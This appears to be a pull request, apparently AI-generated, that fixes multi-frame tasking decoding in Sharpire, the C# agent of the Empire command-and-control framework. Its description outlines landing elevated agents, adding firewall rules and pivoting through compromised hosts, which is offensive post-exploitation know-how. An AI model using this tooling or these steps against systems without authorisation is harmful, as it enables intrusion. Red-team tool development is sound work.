### PR TITLE
fix: process every frame in a multi-packet tasking blob

### DIFF
--- a/Sharpire/Empire.Agent.Coms.cs
+++ b/Sharpire/Empire.Agent.Coms.cs
@@ -359,9 +359,51 @@ AESc = AES encrypted using the client's session key
         private void ProcessTaskingPackets(byte[] encryptedTask)
         {
             byte[] taskingBytes = EmpireStager.AesDecryptAndVerify(sessionInfo.GetSessionKeyBytes(), encryptedTask);
-            PACKET firstPacket = DecodePacket(taskingBytes, 0);
-            byte[] resultPackets = ProcessTasking(firstPacket);
-            SendMessage(resultPackets);
+
+            // The server concatenates queued tasks into one encrypted blob;
+            // each inner frame is a 12-byte header plus payload.
+            const int HEADER_SIZE = 12;
+            int offset = 0;
+            byte[] resultPackets = Array.Empty<byte>();
+            while (offset < taskingBytes.Length)
+            {
+                if (taskingBytes.Length - offset < HEADER_SIZE)
+                {
+                    resultPackets = Misc.combine(resultPackets, EncodePacket(0, "[!] tasking decode failed: trailing bytes shorter than frame header", 0));
+                    break;
+                }
+                long advance;
+                PACKET packet;
+                try
+                {
+                    packet = DecodePacket(taskingBytes, offset);
+                    // packet.length is uint32 from the wire; cast via long so a
+                    // hostile value can't sign-extend negative and walk offset
+                    // backwards into an infinite re-decode loop.
+                    advance = HEADER_SIZE + (long)packet.length;
+                    if (packet.length > int.MaxValue || offset + advance > taskingBytes.Length)
+                    {
+                        resultPackets = Misc.combine(resultPackets, EncodePacket(0, "[!] tasking decode failed: frame length out of range", packet.taskId));
+                        break;
+                    }
+                    byte[] packetResult = ProcessTasking(packet);
+                    if (packetResult != null && packetResult.Length > 0)
+                    {
+                        resultPackets = Misc.combine(resultPackets, packetResult);
+                    }
+                }
+                catch (Exception error)
+                {
+                    resultPackets = Misc.combine(resultPackets, EncodePacket(0, "[!] tasking decode failed: " + error.Message, 0));
+                    break;
+                }
+                offset += (int)advance;
+            }
+
+            if (resultPackets.Length > 0)
+            {
+                SendMessage(resultPackets);
+            }
         }
 
         private byte[] ProcessTasking(PACKET packet)


### PR DESCRIPTION
## Summary
- `ProcessTaskingPackets` only decoded the first frame from the encrypted tasking blob, silently dropping any subsequent tasks. Empire's server concatenates every queued task into one blob per checkin (see [`agent_communication_service.py:1084-1109`](https://github.com/BC-SECURITY/Empire-Sponsors/blob/7.0-dev/empire/server/core/agent_communication_service.py#L1084-L1109)), so any flow that queues two tasks back-to-back lost the second on Sharpire.
- Loops over each inner `[type | totalPackets | packetNumber | taskId | length | data]` frame, accumulates responses via `Misc.combine`, and emits a synthetic error packet on any malformed frame so the server doesn't infinitely re-queue a poisoned blob.
- Adds bounds + sign-extension guards on the wire `length` field — `(int)packet.length` on a value ≥ `0x80000000` would otherwise walk `offset` backwards into an infinite loop.

## Surface that exposed this
The new `port_forward_pivot` listener in Empire queues a `TASK_SHELL` (netsh firewall add) immediately followed by a `TASK_POWERSHELL_CMD_JOB` (relay). Pre-fix Sharpire ran the firewall-add and silently dropped the relay → "no listening port" with no log. PowerShell agent and Gopire both already loop correctly over inner frames; this brings Sharpire to parity.

## Companion PRs
- **Empire `port_forward_pivot` listener:** https://github.com/BC-SECURITY/Empire-Sponsors/pull/1284 — the feature this Sharpire fix unblocks for the Sharpire agent path.
- **Empire Gopire fix:** https://github.com/BC-SECURITY/Empire-Sponsors/pull/1285 — the parallel agent-side bug fix in the Go agent (different bug class, same root project).

## Test plan
- [ ] Rebuild Sharpire via Empire-Compiler so the fix lands in newly generated stagers.
- [ ] On the Empire branch, start an HTTP listener, land an elevated Sharpire agent, then start a `port_forward_pivot` listener with `Agent=<sharpire>`. Pre-fix: only the firewall rule appears; post-fix: `netstat -ano | findstr :<ListenPort>` on the target shows the relay LISTENING and a stager generated against the pivot listener stages back through it.
- [ ] Smoke a normal single-task flow (e.g. `shell whoami`) to confirm no regression on the common case.

🤖 Generated with [Claude Code](https://claude.com/claude-code)